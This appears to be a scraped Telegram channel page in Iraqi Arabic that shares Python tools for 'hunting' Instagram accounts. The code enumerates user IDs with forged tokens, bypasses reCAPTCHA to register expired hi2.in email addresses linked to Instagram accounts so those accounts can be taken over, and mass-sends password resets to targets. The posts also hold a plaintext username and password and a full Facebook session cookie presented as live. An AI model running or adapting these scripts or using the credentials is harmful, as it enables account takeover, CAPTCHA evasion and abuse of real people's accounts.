uk
Feedback
Арабский питон

Арабский питон

Відкрити в Telegram

Привет @durov Канал не нарушает правила Telegram. Нет спама, оскорблений, порнографии или нзаконной торговли. Пожалуйста, пересмотрите жалобы. Спасибо!

Показати більше
1 853
Підписники
-5724 години
-2167 днів
-1 07230 день
Архів дописів
import requests,random,secrets,threading,time,json
from faker import Faker
from requests.adapters import HTTPAdapter
from urllib3.util.retry import Retry
import codecs
a,b="",""
c=threading.Lock()
d=threading.Event()
d.set()
e=0;f=0;g="";h="";i=0;j=threading.local()
def k():
 s=requests.Session();r=Retry(total=2,backoff_factor=0.1,status_forcelist=[500,502,503,504]);a=HTTPAdapter(pool_connections=100,pool_maxsize=100,max_retries=r);s.mount('https://',a);s.mount('http://',a);return s
def l():
 y=random.choice([2012,2013]);z={2012:(17750001,279760000),2013:(279760001,900990000)};return str(random.randint(*z[y]))
def m():
 if not hasattr(j,'s'):j.s=k();j.f=Faker()
 return j.s,j.f
def n():
 s,f=m()
 while True:
  try:
   p=l();q=secrets.token_hex(32);r=secrets.token_hex(27);t=secrets.token_hex(36);u=secrets.token_hex(24);v=f.user_agent();w=''.join(random.choice('936619743392459')for _ in range(15));x={'csrftoken':q,'ps_l':'0','ps_n':'0','ig_did':t,'ig_nrcb':'1','dpr':'2','mid':r,'datr':u};y={'user-agent':v,'viewport-width':'891','x-asbd-id':'129477','x-csrftoken':q,'x-fb-friendly-name':'PolarisProfilePageContentQuery','x-fb-lsd':'AVoRhvRPoRs','x-ig-app-id':w};z={'lsd':'AVoRhvRPoRs','variables':f'{{"id":"{p}","relay_header":false,"render_surface":"PROFILE"}}','server_timestamps':'true','doc_id':'7381344031985950'};o=s.post('https://www.instagram.com/api/graphql',cookies=x,headers=y,data=z,timeout=3);b=o.json()
   if 'data' in b and b['data'] and 'user' in b['data']:
    uf=b['data']['user'];un=uf.get("username","unknown");up=f"{un}";print(up);c.acquire();open('u.txt','a').write(up+'\n');c.release()
  except:continue
if __name__=='__main__':
 t=100;h=[]
 for i in range(t):th=threading.Thread(target=n,daemon=True);th.start();h.append(th)
 try:
  for th in h:th.join()
 except:pass
وذا سيرش

import random
import string

a = string.ascii_lowercase
while True:
    word_length = random.choice([5, 6])
    g = ''.join(random.choice(a) for _ in range(word_length))    
    print(g)    
    with open("list.txt", "a", encoding="utf-8") as f:
        f.write(f"{g}\n")

import requests
import secrets
import threading
import time
from concurrent.futures import ThreadPoolExecutor, as_completed
from faker import Faker
from requests.adapters import HTTPAdapter
from urllib3.util.retry import Retry
f=Faker()
lk=threading.Lock()
th=50
to=10
def gu():
    return f.user_agent()
def gs():
    return secrets.token_hex(16)
def gr():
    s=requests.Session()
    r=Retry(total=3,backoff_factor=0.5,status_forcelist=[500,502,503,504])
    a=HTTPAdapter(max_retries=r)
    s.mount('http://',a)
    s.mount('https://',a)
    return s
def rc():
    try:
        u="https://www.google.com/recaptcha/api2/anchor?ar=1&k=6LfEUPkgAAAAAKTgbMoewQkWBEQhO2VPL4QviKct&co=aHR0cHM6Ly9oaTIuaW46NDQz&hl=en&v=XrIDux0s7SoNe6_IHkjGC92W&size=invisible"
        p=u.split('?')[1]
        g=requests.get(f'https://www.google.com/recaptcha/enterprise/anchor?{p}',timeout=to)
        t=g.text.split('recaptcha-token" value="')[1].split('"')[0]
        su=f"v={p.split('v=')[1].split('&')[0]}&reason=q&c={t}&k=6LfEUPkgAAAAAKTgbMoewQkWBEQhO2VPL4QviKct&co=aHR0cHM6Ly9oaTIuaW46NDQz&hl=en&size=invisible"
        h={"User-Agent":"Mozilla/5.0","Referer":f"https://www.google.com/recaptcha/enterprise/anchor?{p}","Content-Type":"application/x-www-form-urlencoded"}
        fe=requests.post('https://www.google.com/recaptcha/enterprise/reload',data=su,headers=h,timeout=to)
        return fe.text.split('resp","')[1].split('"')[0]
    except:
        return None
def ch(em):
    if "@" in em:
        em=em.split("@")[0]
    su=rc()
    if not su:
        return
    d={'domain':"@hi2.in",'prefix':em,'recaptcha':su}
    h={'User-Agent':"Mozilla/5.0",'Accept':"application/json, text/plain, */*",'authorization':"Basic bnVsbA=="}
    try:
        j=requests.post("https://hi2.in/api/custom",data=d,headers=h,timeout=to).json()
        if 'expiry' in j:
         print(f'\033[1;32mHIT\033[0m : {em}@hi2.in')
         with open("hits.txt", "a", encoding="utf-8") as f:
          f.write(f"{em}\n")
    except:
        pass
def ce(em):
    try:
        u='https://www.instagram.com/api/v1/web/accounts/check_email/'
        h={"user-agent":gu(),"x-csrftoken":gs(),"referer":"https://www.instagram.com/","x-requested-with":"XMLHttpRequest"}
        p={"email":f"{em}@hi2.in"}
        s=gr()
        r=s.post(u,headers=h,data=p,timeout=to)
        d=r.json()
        if d.get("error_type") in ["email_is_taken"] and not d.get("available"):
            print(f'\033[1;32mGD/IN\033[0m : {em}')
            ch(em)
        else:
         print(f'\033[1;31mBAD\033[0m : {em}')
    except:
     print(f'\033[1;31mBAD\033[0m : {em}')
def main():
    cf=input("combo: ").strip()
    with open(cf,'r',errors='ignore') as f:
        ls=[l.strip() for l in f.read().splitlines() if l.strip()]
    with ThreadPoolExecutor(max_workers=th) as ex:
        fs=[ex.submit(ce,l) for l in ls]
        for ft in as_completed(fs):
            pass
if __name__=="__main__":
    main()
ذا سورس الصيد

password rest.py0.05 KB

soheila.___.6587 Waleed@123 بله واحد يسجل بل حساب انستا يشوفه

يا عباد الله هنا الشرح هنااااااا

+1
Proxies.txt

اداة تشكير (صيد) موقع متجر الحسابات تسجلونها بهاذ الموقع تكدر تستخدمها ب بروكسي او بدون لكن اذا نحضرت استخدم بروكسي راح انشر الكم كومبو وبروكسي smmegyfans.com #:-@TO_LS

n.py0.05 KB

بنزل بوت تغير باسورد الحساب

بنزل الكم hi2.in بفكره حلوه اذا صارت بتنزل اروح اشوفه

import httpx
from user_agent import generate_user_agent
k = input("email : ")

def E(t):
    try:
        h = {
            "user-agent": generate_user_agent(),
            "x-ig-app-id": "936619743392459",
            "x-requested-with": "XMLHttpRequest",
            "x-instagram-ajax": "1032099486",
            "x-csrftoken": "missing",
            "x-asbd-id": "359341",
            "origin": "https://www.instagram.com",
            "referer": "https://www.instagram.com/accounts/password/reset/",
            "accept-language": "en-US",
            "priority": "u=1, i",
        }
        r = httpx.Client(http2=True, headers=h, timeout=20).post(
            "https://www.instagram.com/api/v1/web/accounts/account_recovery_send_ajax/",
            data={"email_or_username": t}
        )
        j = r.json()
        if j.get('status') in ['ok']:
            print("Reset sent")
        else:
            print("failed")
    except Exception as e:
        print("failed")

E(k)
ذا سورس يرسل ريست بدون الحساب ما يتبند

smmcpan

hits.txt0.13 KB

import requests,random,secrets,threading,time,json
from faker import Faker
from requests.adapters import HTTPAdapter
from urllib3.util.retry import Retry
import codecs
a,b="",""
c=threading.Lock()
d=threading.Event()
d.set()
e=0;f=0;g="";h="";i=0;j=threading.local()
def k():
 s=requests.Session();r=Retry(total=2,backoff_factor=0.1,status_forcelist=[500,502,503,504]);a=HTTPAdapter(pool_connections=100,pool_maxsize=100,max_retries=r);s.mount('https://',a);s.mount('http://',a);return s
def l():
 y=random.choice([2012,2013]);z={2012:(17750001,279760000),2013:(279760001,900990000)};return str(random.randint(*z[y]))
def m():
 if not hasattr(j,'s'):j.s=k();j.f=Faker()
 return j.s,j.f
def n():
 s,f=m()
 while True:
  try:
   p=l();q=secrets.token_hex(32);r=secrets.token_hex(27);t=secrets.token_hex(36);u=secrets.token_hex(24);v=f.user_agent();w=''.join(random.choice('936619743392459')for _ in range(15));x={'csrftoken':q,'ps_l':'0','ps_n':'0','ig_did':t,'ig_nrcb':'1','dpr':'2','mid':r,'datr':u};y={'user-agent':v,'viewport-width':'891','x-asbd-id':'129477','x-csrftoken':q,'x-fb-friendly-name':'PolarisProfilePageContentQuery','x-fb-lsd':'AVoRhvRPoRs','x-ig-app-id':w};z={'lsd':'AVoRhvRPoRs','variables':f'{{"id":"{p}","relay_header":false,"render_surface":"PROFILE"}}','server_timestamps':'true','doc_id':'7381344031985950'};o=s.post('https://www.instagram.com/api/graphql',cookies=x,headers=y,data=z,timeout=3);b=o.json()
   if 'data' in b and b['data'] and 'user' in b['data']:
    uf=b['data']['user'];un=uf.get("username","unknown");up=f"{un}";print(up);c.acquire();open('u.txt','a').write(up+'\n');c.release()
  except:continue
if __name__=='__main__':
 t=100;h=[]
 for i in range(t):th=threading.Thread(target=n,daemon=True);th.start();h.append(th)
 try:
  for th in h:th.join()
 except:pass
وذا سيرش

import requests
import secrets
import threading
import time
from concurrent.futures import ThreadPoolExecutor, as_completed
from faker import Faker
from requests.adapters import HTTPAdapter
from urllib3.util.retry import Retry

f=Faker()
lk=threading.Lock()
th=100
to=10

def gu():
    return f.user_agent()

def gs():
    return secrets.token_hex(16)

def gr():
    s=requests.Session()
    r=Retry(total=3,backoff_factor=0.5,status_forcelist=[500,502,503,504])
    a=HTTPAdapter(max_retries=r)
    s.mount('http://',a)
    s.mount('https://',a)
    return s

def rc():
    try:
        u="https://www.google.com/recaptcha/api2/anchor?ar=1&k=6LfEUPkgAAAAAKTgbMoewQkWBEQhO2VPL4QviKct&co=aHR0cHM6Ly9oaTIuaW46NDQz&hl=en&v=XrIDux0s7SoNe6_IHkjGC92W&size=invisible"
        p=u.split('?')[1]
        g=requests.get(f'https://www.google.com/recaptcha/enterprise/anchor?{p}',timeout=to)
        t=g.text.split('recaptcha-token" value="')[1].split('"')[0]
        su=f"v={p.split('v=')[1].split('&')[0]}&reason=q&c={t}&k=6LfEUPkgAAAAAKTgbMoewQkWBEQhO2VPL4QviKct&co=aHR0cHM6Ly9oaTIuaW46NDQz&hl=en&size=invisible"
        h={"User-Agent":"Mozilla/5.0","Referer":f"https://www.google.com/recaptcha/enterprise/anchor?{p}","Content-Type":"application/x-www-form-urlencoded"}
        fe=requests.post('https://www.google.com/recaptcha/enterprise/reload',data=su,headers=h,timeout=to)
        return fe.text.split('resp","')[1].split('"')[0]
    except:
        return None

def ch(em):
    if "@" in em:
        em=em.split("@")[0]
    su=rc()
    if not su:
        return
    d={'domain':"@hi2.in",'prefix':em,'recaptcha':su}
    h={'User-Agent':"Mozilla/5.0",'Accept':"application/json, text/plain, */*",'authorization':"Basic bnVsbA=="}
    try:
        j=requests.post("https://hi2.in/api/custom",data=d,headers=h,timeout=to).json()
        if 'expiry' in j:
         print(f'\033[1;32mHIT\033[0m : {em}@hi2.in')
         with open("hits.txt", "a", encoding="utf-8") as f:
          f.write(f"{em}\n")
    except:
        pass

def ce(em):
    try:
        u='https://www.instagram.com/api/v1/web/accounts/check_email/'
        h={"user-agent":gu(),"x-csrftoken":gs(),"referer":"https://www.instagram.com/","x-requested-with":"XMLHttpRequest"}
        p={"email":f"{em}@hi2.in"}
        s=gr()
        r=s.post(u,headers=h,data=p,timeout=to)
        d=r.json()
        if d.get("error_type") in ["email_is_taken"] and not d.get("available"):
            print(f'\033[1;32mGD/IN\033[0m : {em}')
            ch(em)
        else:
         print(f'\033[1;31mBAD\033[0m : {em}')
    except:
     print(f'\033[1;31mBAD\033[0m : {em}')

def main():
    cf=input("combo: ").strip()
    with open(cf,'r',errors='ignore') as f:
        ls=[l.strip() for l in f.read().splitlines() if l.strip()]
    with ThreadPoolExecutor(max_workers=th) as ex:
        fs=[ex.submit(ce,l) for l in ls]
        for ft in as_completed(fs):
            pass
if __name__=="__main__":
    main()
ذا السورس جربه هيج انتم هسه بكرا بعدل عليه اسوي فول هسه انعس وسويت هذه

datr=5ZqxafNmf3da96OFV41vK4Rf;sb=5ZqxaZi950ogM6mzW4Cbpqqd;ps_l=1;ps_n=1;c_user=61584957580291;xs=1%3A9y5jCE2R-cO0WA%3A2%3A1773248373%3A-1%3A-1;locale=ar_AR;pas=61584957580291%3AcFvcRqd01h;vpd=v1%3B704x360x3;fr=06uB7rSsTwjzSnQIE.AWdRq_t7Qn5ybQhdnF1cQmPrtCRREGMwSKNQ3gCzVGtIBI4hTIg.BpsZrl..AAA.0.0.Bpsh9z.AWfmtiB9flZWtYM_IB9uOyO5KYI;wl_cbv=v2%3Bclient_version%3A3109%3Btimestamp%3A1773281139;fbl_st=101015725%3BT%3A29554685; حولة بل قناة يدورون كوكيز هذا رهيب 🥸

ذا حقيقي كله ماكو وهمي

ما شاء الله القناة متفاعله

خوش رشق 👀